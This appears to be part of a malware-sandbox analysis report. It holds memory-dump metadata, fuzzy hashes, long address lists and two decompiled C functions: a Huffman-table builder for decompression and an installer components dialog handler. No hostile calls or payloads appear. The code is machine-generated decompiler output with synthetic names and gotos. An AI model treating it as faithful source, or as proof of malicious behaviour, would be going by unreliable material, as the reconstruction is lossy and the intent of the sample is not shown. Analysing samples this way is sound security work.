0x00406c07
0x00406c0a
0x00406c0c
0x00000000
0x00406c12
0x00406c12
0x00406c16
0x00406c21
0x00406c34
0x00406c39
0x00406c3e
0x00406c40
0x00000000
0x00000000
0x00406c46
0x00406c46
0x00406c49
0x00406c4b
0x00406c59
0x00406c59
0x00406c5c
0x00406c5c
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c4d
0x00406c4d
0x00406c53
0x00000000
0x00000000
0x00000000
0x00406c53
0x00000000
0x00000000
0x00000000
0x00406ff2
0x00406ff2
0x00406ff8
0x00406ffe
0x00407003
0x00407009
0x0040700f
0x00407011
0x00407014
0x0040701d
0x00407023
0x00407023
0x00407016
0x00407018
0x0040701a
0x0040701a
0x00407025
0x00407027
0x0040702a
0x00407065
0x00407065
0x00000000
0x0040702c
0x0040702c
0x0040702c
0x00407032
0x00407035
0x00407037
0x0040706c
0x0040706e
0x00000000
0x0040706e
0x00000000
0x00407037
0x00000000
0x00406676
0x00407044
0x00000000
0x00407044
0x00406a58
0x00406a5a
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a5f
0x00000000
0x00406a5f
0x004069a4
0x00406965
0x00407049
0x0040704c
0x0040704e
0x00407057
0x0040705d
0x00000000

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407127
0x0040712f
0x00407133
0x00407135
0x00407138
0x0040713a
0x0040713a
0x0040713c
0x00407143
0x00407145
0x00407145
0x0040714b
0x00407160
0x00407168
0x0040716a
0x0040716c
0x0040716f
0x00407170
0x00407170
0x00407176
0x00000000
0x00000000
0x00407178
0x0040717b
0x00000000
0x00000000
0x00000000
0x0040717b
0x0040717f
0x00407182
0x00407184
0x00407184
0x00407187
0x0040718d
0x0040718e
0x00000000
0x00000000
0x00000000
0x0040718e
0x00407193
0x00407196
0x00407198
0x00407198
0x0040719e
0x004071a0
0x004071b1
0x004071a4
0x004071a8
0x0040744d
0x00000000
0x0040744d
0x004071ae
0x004071af
0x004071af
0x004071b7
0x004071ba
0x004071be
0x004071c0
0x004071c2
0x004071c5
0x00000000
0x00000000
0x004071cd
0x004071d3
0x004071d5
0x004071d7
0x004071d8
0x004071ed
0x004071ed
0x004071f0
0x004071f2
0x004071f2
0x004071f4
0x004071f9
0x004071fb
0x00407202
0x00407204
0x0040720c
0x0040720c
0x0040720e
0x0040720f
0x0040721e
0x00407222
0x00407226
0x00407229
0x0040722c
0x00407231
0x00407234
0x0040723a
0x00407241
0x00407247
0x00407440
0x00407440
0x00407445
0x00407454
0x00000000
0x00000000
0x00000000
0x00407445
0x00407254
0x00407257
0x0040725a
0x0040725d
0x00407261
0x00000000
0x00000000
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407278
0x0040727b
0x00000000
0x00000000
0x00407281
0x00407282
0x00407285
0x00407288
0x0040728b
0x00407291
0x00407293
0x00407293
0x0040729b
0x0040729f
0x004072a4
0x004072c9
0x004072cf
0x004072d1
0x004072d3
0x004072d6
0x004072df
0x00000000
0x00000000
0x004072a6
0x004072a6
0x004072af
0x004072b3
0x00000000
0x00000000
0x004072c4
0x004072c4
0x004072c7
0x00000000
0x00000000
0x004072b7
0x004072ba
0x004072bc
0x004072c0
0x00000000
0x00000000
0x004072c2
0x004072c2
0x00000000
0x004072c4
0x004072e8
0x004072ee
0x004072f8
0x004072fa
0x004072ff
0x00407301
0x00407337
0x00407303
0x00407303
0x00407306
0x00407309
0x00407313
0x00407316
0x0040731d
0x00407328
0x0040732f
0x0040732f
0x00407339
0x0040733c
0x0040733e
0x00407344
0x00407344
0x0040734d
0x00407350
0x00407355
0x00407364
0x0040736c
0x00407371
0x00407395
0x0040739d
0x004073a1
0x004073a7
0x00407373
0x00407381
0x00407384
0x0040738a
0x0040738a
0x004073ab
0x00407366
0x00407366
0x00407366
0x004073bc
0x004073c0
0x004073cc
0x004073c7
0x004073ca
0x004073ca
0x004073d4
0x004073d9
0x004073e1
0x004073dd
0x004073df
0x004073df
0x004073e7
0x004073e9
0x004073f0
0x004073fa
0x00407404
0x00407420
0x00407424
0x00407269
0x0040726f
0x00407270
0x00407272
0x00407278
0x0040727b
0x00000000
0x00000000
0x00000000
0x0040727b
0x00000000
0x00000000
0x00000000
0x00000000
0x00407406
0x00407406
0x00407406
0x0040740b
0x00407414
0x0040741d
0x00000000
0x0040741d
0x0040742a
0x0040742a
0x0040742d
0x00407434
0x00407437
0x00000000
0x0040725a
0x004071da
0x004071dc
0x004071dc
0x004071e0
0x004071e3
0x004071e4
0x004071e4
0x00000000
0x004071dc
0x00407150
0x00407156
0x00000000

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404B80, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				void* _t205;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t287;
				long _t290;
				void* _t291;
				signed int _t300;
				signed int _t308;
				void* _t309;
				void* _t310;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f468;
				_v28 =  *0x42f434 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f43d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404ACE(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a874; // 0x0
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a888; // 0x0
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f4a0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B4E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_t205 =  *0x42a888; // 0x0
									_v36 = _t205;
									_t206 =  *0x42f468;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f46c <= 0) {
										L86:
										if( *0x42f42c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x60b8d8
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f46c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4a0 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E0040417B(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f46c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										_t287 = SendMessageA(_v8, 0x1100, 0,  &_v88);
										_t309 =  *0x42a888; // 0x0
										 *(_t309 + _t329 * 4) = _t287;
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_t310 =  *0x42a888; // 0x0
									_v36 = 1;
									 *(_t310 + _t329 * 4) = _t290;
									_t291 =  *0x42a888; // 0x0
									_v16 =  *(_t291 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f46c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004041B0(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004041B0(_v12);
								L93:
								return E004041E2(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404b9e
0x00404ba6
0x00404bae
0x00404bb4
0x00404bcc
0x00404bcf
0x00404bd0
0x00404dfd
0x00404e04
0x00404e18
0x00404e06
0x00404e08
0x00404e0b
0x00404e0c
0x00404e13
0x00404e13
0x00404e24
0x00404e32
0x00404e35
0x00404e4b
0x00404ec0
0x00404ec3
0x00404ec5
0x00404ecf
0x00404edd
0x00404edd
0x00404edf
0x00404ee9
0x00404eef
0x00404ef2
0x00404ef5
0x00404f10
0x00404ef7
0x00404f01
0x00404f01
0x00404ef5
0x00404ee9
0x00000000
0x00404ec3
0x00404e50
0x00404e5b
0x00404e60
0x00404e67
0x00404e6c
0x00404e70
0x00404e7b
0x00404e7b
0x00404e7f
0x00404e83
0x00404e87
0x00404e9a
0x00404e89
0x00404e89
0x00404e90
0x00404e96
0x00404e92
0x00404e92
0x00404e92
0x00404e90
0x00404e9e
0x00404ea0
0x00404eb3
0x00404eb6
0x00404eb9
0x00404eb9
0x00404e83
0x00000000
0x00404e70
0x00404e52
0x00404e59
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404f13
0x00404f13
0x00404f1a
0x00404f8b
0x00404f93
0x00404f9b
0x00404f9b
0x00404fa4
0x00404fa6
0x00404fad
0x00404fb0
0x00404fb0
0x00404fb6
0x00404fbd
0x00404fc0
0x00404fc0
0x00404fc6
0x00404fcc
0x00404fd2
0x00404fd2
0x00404fdf
0x0040513f
0x00405146
0x00405163
0x00405169
0x0040517b
0x0040517b
0x00000000
0x00404fe5
0x00404fe7
0x00404fec
0x00404ff1
0x00404ff6
0x00404ff8
0x00404ff8
0x00404ff9
0x00404ffa
0x00404ffc
0x00404ffc
0x00405004
0x00405045
0x00405047
0x0040504c
0x00405057
0x0040505a
0x0040505f
0x00405066
0x00405069
0x0040510b
0x00405113
0x0040511b
0x0040511b
0x00405121
0x00405129
0x0040513a
0x0040513a
0x00000000
0x00405129
0x0040506f
0x00405072
0x00405078
0x0040507d
0x0040507f
0x00405081
0x00405087
0x0040508e
0x00405093
0x0040509a
0x0040509d
0x0040509d
0x004050a4
0x004050b0
0x004050b4
0x004050b6
0x004050b6
0x004050a6
0x004050a8
0x004050a8
0x004050d6
0x004050e2
0x004050f1
0x004050f1
0x004050f3
0x004050f6
0x004050ff
0x00000000
0x00405006
0x00405011
0x00405014
0x00405019
0x0040501b
0x0040501f
0x0040502f
0x00405039
0x0040503b
0x0040503e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405021
0x00405021
0x00405027
0x00405029
0x00405029
0x0040502a
0x0040502b
0x00000000
0x00405021
0x00405004
0x00404fdf
0x00404f22
0x00000000
0x00404f38
0x00404f42
0x00404f47
0x00000000
0x00000000
0x00404f59
0x00404f5e
0x00404f6a
0x00404f6a
0x00404f6c
0x00404f7b
0x00404f7d
0x00404f81
0x00404f84
0x00000000
0x00404f84
0x00404f22
0x00404bd6
0x00404bd9
0x00404bdc
0x00404bec
0x00404bff
0x00404c0a
0x00404c10
0x00404c1e
0x00404c31
0x00404c36
0x00404c41
0x00404c4a
0x00404c60
0x00404c70
0x00404c7c
0x00404c7c
0x00404c81
0x00404c87
0x00404c89
0x00404c8c
0x00404c91
0x00404c96
0x00404c98
0x00404c98
0x00404cb8
0x00404cb8
0x00404cba
0x00404cbb
0x00404cc0
0x00404cc6
0x00404cca
0x00404ccf
0x00404cd7
0x00404cdb
0x00404ce0
0x00404ce5
0x00404ced
0x00404cf0
0x00404dbf
0x00404dd2
0x00000000
0x00404cf6
0x00404cf9
0x00404cfc
0x00404cff
0x00404cff
0x00404d04
0x00404d0d
0x00404d10
0x00404d14
0x00404d17
0x00404d1a
0x00404d23
0x00404d2c
0x00404d2f
0x00404d32
0x00404d35
0x00404d73
0x00404d96
0x00404d98
0x00404d9e
0x00404d75
0x00404d84
0x00404d84
0x00404d37
0x00404d3a
0x00404d48
0x00404d52
0x00404d54
0x00404d5a
0x00404d61
0x00404d64
0x00404d6c
0x00404d6c
0x00404d35
0x00404da4
0x00404da5
0x00404db1
0x00404db1
0x00404dbd
0x00404dd8
0x00404ddb
0x00404df8
0x00000000
0x00404ddd
0x00404de2
0x00404deb
0x0040517d
0x0040518f
0x0040518f
0x00404ddb
0x00000000
0x00404dbd
0x00404cf0

APIs

GetDlgItem.USER32 ref: 00404B97
